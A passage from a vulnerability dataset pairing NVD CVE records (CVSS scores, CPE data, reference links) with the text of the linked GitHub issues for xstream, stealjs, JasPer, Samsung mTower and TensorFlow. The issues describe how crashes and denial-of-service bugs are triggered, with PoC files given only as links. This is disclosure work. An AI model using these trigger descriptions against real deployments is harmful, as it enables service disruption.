"impactScore": 3.6,
"source": "cve-coordination@google.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve-coordination@google.com",
"tags": [
"Exploit",
"Permissions Required",
"Third Party Advisory"
],
"url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=47367"
},
{
"source": "cve-coordination@google.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/x-stream/xstream/issues/304"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Permissions Required",
"Third Party Advisory"
],
"url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=47367"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/x-stream/xstream/issues/304"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A6DDFDA0-5B71-4DEF-98C5-216EE4042401",
"versionEndExcluding": null,
"versionEndIncluding": "1.4.19",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/x-stream/xstream/issues/304 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"x-stream",
"xstream"
] | Dear xstream maintainers,
Multiple bugs(Stackoverflows) were found during fuzzing by [Jazzer](https://github.com/CodeIntelligenceTesting/jazzer) in xstream. We would like to provide you with access to the bugs at Google OSS-Fuzz before they get publicly disclosed.
What do we need from you?
We need an email address that is associated with a Google Account as per [Accept new projects](https://google.github.io/oss-fuzz/getting-started/accepting-new-projects/). In the past we have already contacted you during the onboarding of your project, but the request was rejected or no email was shared with us.
What do you get by sharing your email address?
When a bug is found, you will receive an email that will provide you with access to ClusterFuzz, crash reports, code coverage reports and fuzzer statistics. Each finding will have a crashing input that you can use to easily reproduce the bug.
Attention: All bug details will be made public automatically after the deadline of 90 days has exceeded or after the fix is released. For projects without maintainers we will do our best to support the disclosure process. Depending on our resources we will try to create an issues for every bug in your public issues tracker. In addition, we will request CVEs for security related vulnerabilities.
Please let me know if you have any questions regarding fuzzing or the OSS-Fuzz integration.
Thank you for your reading and hope to hear from you soon! | New OSS-Fuzz Findings in xstream | https://api.github.com/repos/x-stream/xstream/issues/304/comments | 45 | 2022-08-04T12:20:17Z | 2022-12-23T22:37:34Z | https://github.com/x-stream/xstream/issues/304 | 1,328,536,856 | 304 | 4,158 |
CVE-2022-37258 | 2022-09-16T22:15:12.097 | Prototype pollution vulnerability in function convertLater in npm-convert.js in stealjs steal 2.2.4 via the packageName variable in npm-convert.js. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/npm-convert.js#L362"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/npm-convert.js#L369"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/issues/1527"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/npm-convert.js#L362"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/npm-convert.js#L369"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/issues/1527"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:stealjs:steal:2.2.4:*:*:*:*:*:*:*",
"matchCriteriaId": "F01F1B6C-0486-4C61-A8F0-5ABAC7B0E168",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"1321"
] | 1321 | https://github.com/stealjs/steal/issues/1527 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"stealjs",
"steal"
] | Prototype pollution vulnerability in function convertLater in npm-convert.js in stealjs steal 2.2.4 via the packageName variable in npm-convert.js.
The prototype pollution vulnerability can be mitigated with several best practices described here: https://learn.snyk.io/lessons/prototype-pollution/javascript/
| [CVE-2022-37258]/Prototype pollution found in npm-convert.js | https://api.github.com/repos/stealjs/steal/issues/1527/comments | 0 | 2022-09-14T09:17:00Z | 2022-09-14T09:17:00Z | https://github.com/stealjs/steal/issues/1527 | 1,372,641,337 | 1,527 | 4,159 |
CVE-2022-40755 | 2022-09-16T22:15:12.303 | JasPer 3.0.6 allows denial of service via a reachable assertion in the function inttobits in libjasper/base/jas_image.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jasper-software/jasper/issues/338"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jasper-software/jasper/issues/338"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jasper_project:jasper:3.0.6:*:*:*:*:*:*:*",
"matchCriteriaId": "CD0938AD-12F3-4B02-899A-A54286B9FFEE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"617"
] | 617 | https://github.com/jasper-software/jasper/issues/338 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"jasper-software",
"jasper"
] | ## summary
Hello, I was testing my fuzzer and found a reachable assertion in imginfo. An assertion in function inttobits can be reached when parsing a crafted jp2 file, when running `./imginfo -f $POC`, as shown in the attachment
## Environment
* Ubuntu 22.04 (docker)
* gcc/g++ 11.2.0
* jasper latest commit 0c2a927c530d18a706ace73536f347354ca3d957
## Step to reproduce
```
mkdir jasper-build && pushd jasper-build
cmake -DJAS_ENABLE_SHARED=NO .. && make -j$(nproc)
./src/app/imginfo -f $POC
```
## output
```
imginfo: /benchmark/jasper/src/libjasper/base/jas_image.c:1010: inttobits: Assertion `v >= 0 || sgnd' failed.
Aborted (core dumped)
```
## POC
[poc0.zip](https://github.com/jasper-software/jasper/files/9554506/poc0.zip)
## Credit
Han Zheng (NCNIPC of China, Hexhive)
Yin Li, Xiaotong Jiao (NCNIPC of China)
| [BUG] Reachable assertion in inttobits, jas_image.c | https://api.github.com/repos/jasper-software/jasper/issues/338/comments | 10 | 2022-09-13T07:26:35Z | 2022-11-04T16:13:07Z | https://github.com/jasper-software/jasper/issues/338 | 1,370,986,252 | 338 | 4,160 |
CVE-2022-40757 | 2022-09-16T22:15:12.347 | A Buffer Access with Incorrect Length Value vulnerablity in the TEE_MACComputeFinal function in Samsung mTower through 0.3.0 allows a trusted application to trigger a Denial of Service (DoS) by invoking the function TEE_MACComputeFinal with an excessive size value of messageLen. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/lib/libutee/tee_api_operations.c#L1031"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/Samsung/mTower/issues/81"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/lib/libutee/tee_api_operations.c#L1031"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/Samsung/mTower/issues/81"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:samsung:mtower:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8C72C53B-9CF2-4F9A-90C1-3A1FE236BA5B",
"versionEndExcluding": null,
"versionEndIncluding": "0.3.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"119"
] | 119 | https://github.com/Samsung/mTower/issues/81 | [
"Third Party Advisory"
] | github.com | [
"Samsung",
"mTower"
] | Buffer Access with Incorrect Length Value in the function TEE_MACUpdate
**Affected components:**
affected source code file: /tee/lib/libutee/tee_api_objects.c, affected functions: TEE_MACUpdate
**Attack vector(s)**
To exploit the vulnerability, invoke the function TEE_MACUpdate and pass an excessive size value of "chunkSize".
**Suggested description of the vulnerability for use in the CVE**
Buffer Access with Incorrect Length Value vulnerablity in TEE_MACUpdate function in Samsung Electronics mTower v0.3.0 (and earlier) allows a trusted application to trigger a Denial of Service (DoS) via invoking the function TEE_MACUpdate with a excessive size value of "chunkSize".
**Discoverer(s)/Credits**
SyzTrust
**Reference(s)**
https://github.com/Samsung/mTower
https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/lib/libutee/tee_api_operations.c#L1188
https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/crypto/libtomcrypt/include/tomcrypt_hash.h#L397
**Additional information**
The TEE_MACUpdate function takes an argument "chunkSize". This value is passed by TA, and TEE_MACUpdate does not check whether it is equal to the size of "chunk" or not. With an excessive large value, executing the statement "memcpy(md-> state_var .buf + md-> state_var.curlen, in, (size_t)n);" later may crash the trusted execution environment kernel and cause a Denial of Service (DoS).
---
Buffer Access with Incorrect Length Value in the function TEE_MACComputeFinal
**Affected components:**
affected source code file: /tee/lib/libutee/tee_api_objects.c, affected functions: TEE_MACComputeFinal
**Attack vector(s)**
To exploit the vulnerability, invoke the function TEE_MACComputeFinal and pass an excessive size value of "messageLen".
**Suggested description of the vulnerability for use in the CVE**
Buffer Access with Incorrect Length Value vulnerablity in TEE_MACComputeFinal function in Samsung Electronics mTower v0.3.0 (and earlier) allows a trusted application to trigger a Denial of Service (DoS) via invoking the function TEE_MACComputeFinal with a excessive size value of "messageLen".
**Discoverer(s)/Credits**
SyzTrust
**Reference(s)**
https://github.com/Samsung/mTower
https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/lib/libutee/tee_api_operations.c#L1031
**Additional information**
The TEE_MACComputeFinal function takes an argument "messageLen". This value is passed by TA, and TEE_MACComputeFinal does not check whether it is the size of "message" or not. With an excessive large value, executing the statement "res = utee_cipher_update(operation->state, srcData, srcLen, destData, &dl);" later will crash the trusted execution environment kernel and cause a Denial of Service (DoS).
---
Buffer Access with Incorrect Length Value in the function TEE_CipherUpdate
**Affected components:**
affected source code file: /tee/lib/libutee/tee_api_objects.c, affected functions: TEE_CipherUpdate
**Attack vector(s)**
To exploit the vulnerability, invoke the function TEE_CipherUpdate and pass an excessive size value of "srcLen".
**Suggested description of the vulnerability for use in the CVE**
Buffer Access with Incorrect Length Value vulnerablity in TEE_CipherUpdate function in Samsung Electronics mTower v0.3.0 (and earlier) allows a trusted application to trigger a Denial of Service (DoS) via invoking the function TEE_CipherUpdate with a excessive size value of "srcLen".
**Discoverer(s)/Credits**
SyzTrust
**Reference(s)**
https://github.com/Samsung/mTower
https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/lib/libutee/tee_api_operations.c#L1224
**Additional information**
The TEE_CipherUpdate function takes an argument "srcLen". This value is passed by TA, and TEE_CipherUpdate does not check whether it is the size of "srcData" or not. With an excessive large value, executing the statement "res = utee_hash_final(operation->state, message, messageLen, mac, &ml);" later will crash the trusted execution environment kernel and cause a Denial of Service (DoS).
*THANK YOU FOR CONTRIBUTIONS IN MTOWER TEE OS!* | Security: Buffer Access with Incorrect Length Value in TEE_MACUpdate, TEE_MACComputeFinal and TEE_CipherUpdate | https://api.github.com/repos/Samsung/mTower/issues/81/comments | 0 | 2022-09-16T14:10:07Z | 2022-11-28T10:30:30Z | https://github.com/Samsung/mTower/issues/81 | 1,376,007,292 | 81 | 4,161 |
CVE-2022-40759 | 2022-09-16T22:15:12.430 | A NULL pointer dereference issue in the TEE_MACCompareFinal function in Samsung mTower through 0.3.0 allows a trusted application to trigger a Denial of Service (DoS) by invoking the function TEE_MACCompareFinal with a NULL pointer for the parameter operation. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/lib/libutee/tee_api_operations.c#L1249"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/Samsung/mTower/issues/80"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/lib/libutee/tee_api_operations.c#L1249"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/Samsung/mTower/issues/80"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:samsung:mtower:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8C72C53B-9CF2-4F9A-90C1-3A1FE236BA5B",
"versionEndExcluding": null,
"versionEndIncluding": "0.3.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/Samsung/mTower/issues/80 | [
"Third Party Advisory"
] | github.com | [
"Samsung",
"mTower"
] | **Affected components:**
affected source code file: /tee/lib/libutee/tee_api_objects.c, affected functions: TEE_MACCompareFinal
**Attack vector(s)**
To exploit the vulnerability, invoke the function TEE_MACCompareFinal and pass a NULL pointer to the parameter "operation".
**Suggested description of the vulnerability for use in the CVE**
Null pointer dereference vulnerablity in TEE_MACCompareFinal function in Samsung Electronics mTower v0.3.0 (and earlier) allows a trusted application to trigger a Denial of Service (DoS) via invoking the function TEE_MACCompareFinal with a Null pointer of the parameter "operation".
**Discoverer(s)/Credits**
SyzTrust
**Reference(s)**
https://github.com/Samsung/mTower
https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/lib/libutee/tee_api_operations.c#L1249
**Additional information**
The TEE_MACCompareFinal function takes a pointer "operation". This value is passed by TA, and TEE_MACCompareFinal does not check whether it is a null pointer or not. Executing the statement "if (operation->info.operationClass != TEE_OPERATION_MAC)" later will crash the trusted execution environment kernel and cause a Denial of Service (DoS).
*THANK YOU FOR CONTRIBUTIONS IN MTOWER TEE OS!* | Security: NULL Pointer Dereference in the function TEE_MACCompareFinal | https://api.github.com/repos/Samsung/mTower/issues/80/comments | 0 | 2022-09-16T14:06:28Z | 2022-11-21T11:13:40Z | https://github.com/Samsung/mTower/issues/80 | 1,376,002,655 | 80 | 4,162 |
CVE-2022-40761 | 2022-09-16T22:15:12.517 | The function tee_obj_free in Samsung mTower through 0.3.0 allows a trusted application to trigger a Denial of Service (DoS) by invoking the function TEE_AllocateOperation with a disturbed heap layout, related to utee_cryp_obj_alloc. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/tee/tee_obj.c#L109"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/tee/tee_svc_cryp.c#L1248"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/Samsung/mTower/issues/83"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/tee/tee_obj.c#L109"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/tee/tee_svc_cryp.c#L1248"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/Samsung/mTower/issues/83"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:samsung:mtower:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8C72C53B-9CF2-4F9A-90C1-3A1FE236BA5B",
"versionEndExcluding": null,
"versionEndIncluding": "0.3.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"1284"
] | 1284 | https://github.com/Samsung/mTower/issues/83 | [
"Third Party Advisory"
] | github.com | [
"Samsung",
"mTower"
] | **Affected components:**
affected source code file: /tee/tee/tee_svc_cryp.c, affected functions: utee_cryp_obj_alloc
affected source code file: /tee/tee/tee_obj.c, affected functions: tee_obj_alloc and tee_obj_free
**Attack vector(s)**
One way to exploit the vulnerability, invoking the function `TEE_AllocateOperation` and `TEE_Realloc` with a large size to disturb the heap layout, and invoke `TEE_AllocateOperation` again.
**Suggested description of the vulnerability for use in the CVE**
Improper Input Validation vulnerablity in the function `tee_obj_free` in Samsung Electronics mTower v0.3.0 (and earlier) allows a trusted application to trigger a Denial of Service (DoS) via invoking the function `TEE_AllocateOperation` with a disturbed heap layout.
**Discoverer(s)/Credits**
SyzTrust
**Reference(s)**
https://github.com/Samsung/mTower
https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/tee/tee_svc_cryp.c#L1248
https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/tee/tee_obj.c#L109
**Additional information**
As shown in POC, the `calloc` function in `tee_obj_alloc` does not return a buffer with all bits zero as expected when the heap layout was disturbed in mTower on a real IoT hardware (such as Numaker-PFM-M2351). Executing the statement `free(o->attr)` then will free an invalid pointer, which will crash the trusted execution environment kernel and cause a Denial of Service (DoS).
**PoC**
[poc_14.zip](https://github.com/Samsung/mTower/files/9584787/poc_14.zip)
*THANK YOU FOR CONTRIBUTIONS IN MTOWER TEE OS!* | Security: Improper Input Validation in the function utee_cryp_obj_alloc | https://api.github.com/repos/Samsung/mTower/issues/83/comments | 0 | 2022-09-16T14:14:28Z | 2022-11-24T19:39:39Z | https://github.com/Samsung/mTower/issues/83 | 1,376,012,858 | 83 | 4,163 |
CVE-2022-40762 | 2022-09-16T22:15:12.557 | A Memory Allocation with Excessive Size Value vulnerablity in the TEE_Realloc function in Samsung mTower through 0.3.0 allows a trusted application to trigger a Denial of Service (DoS) by invoking the function TEE_Realloc with an excessive number for the parameter len. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/lib/libutee/tee_api.c#L319"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/Samsung/mTower/issues/82"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/lib/libutee/tee_api.c#L319"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/Samsung/mTower/issues/82"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:samsung:mtower:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8C72C53B-9CF2-4F9A-90C1-3A1FE236BA5B",
"versionEndExcluding": null,
"versionEndIncluding": "0.3.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"770"
] | 770 | https://github.com/Samsung/mTower/issues/82 | [
"Third Party Advisory"
] | github.com | [
"Samsung",
"mTower"
] | **Affected components:**
affected source code file: /tee/lib/libutee/tee_api.c, affected functions: TEE_Realloc
**Attack vector(s)**
To exploit the vulnerability, invoke the function TEE_Realloc and pass a large number to the parameter "len".
**Suggested description of the vulnerability for use in the CVE**
Memory Allocation with Excessive Size Value vulnerablity in TEE_Realloc function in Samsung Electronics mTower v0.3.0 (and earlier) allows a trusted application to trigger a Denial of Service (DoS) via invoking the function TEE_Realloc with an excessive number of the parameter "len".
**Discoverer(s)/Credits**
SyzTrust
**Reference(s)**
https://github.com/Samsung/mTower
https://github.com/Samsung/mTower/blob/efd36709306a9afcca5b4782499d01be0c7a02a5/tee/lib/libutee/tee_api.c#L319
**Additional information**
The function TEE_Realloc does not check the size of chunk to realloc. Executing the statement "tee_user_mem_realloc" with an excessive size value on a real IoT hardware (such as Numaker-PFM-M2351) will crash the trusted execution environment kernel and cause a Denial of Service (DoS).
*THANK YOU FOR CONTRIBUTIONS IN MTOWER TEE OS!* | Security: Memory Allocation with Excessive Size Value in the function TEE_Realloc | https://api.github.com/repos/Samsung/mTower/issues/82/comments | 0 | 2022-09-16T14:12:09Z | 2022-10-25T13:47:21Z | https://github.com/Samsung/mTower/issues/82 | 1,376,009,885 | 82 | 4,164 |
CVE-2022-36027 | 2022-09-16T23:15:11.430 | TensorFlow is an open source platform for machine learning. When converting transposed convolutions using per-channel weight quantization the converter segfaults and crashes the Python process. We have patched the issue in GitHub commit aa0b852a4588cea4d36b74feb05d93055540b450. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/aa0b852a4588cea4d36b74feb05d93055540b450"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/53767"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-79h2-q768-fpxr"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/aa0b852a4588cea4d36b74feb05d93055540b450"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/53767"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-79h2-q768-fpxr"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C6622D95-1C86-45C5-AB55-E6EEEA0996DF",
"versionEndExcluding": "2.7.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0F9D273D-02DC-441E-AA91-EAC8DEAA4B44",
"versionEndExcluding": "2.8.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.8.0",
"vulnerable": true
},
{
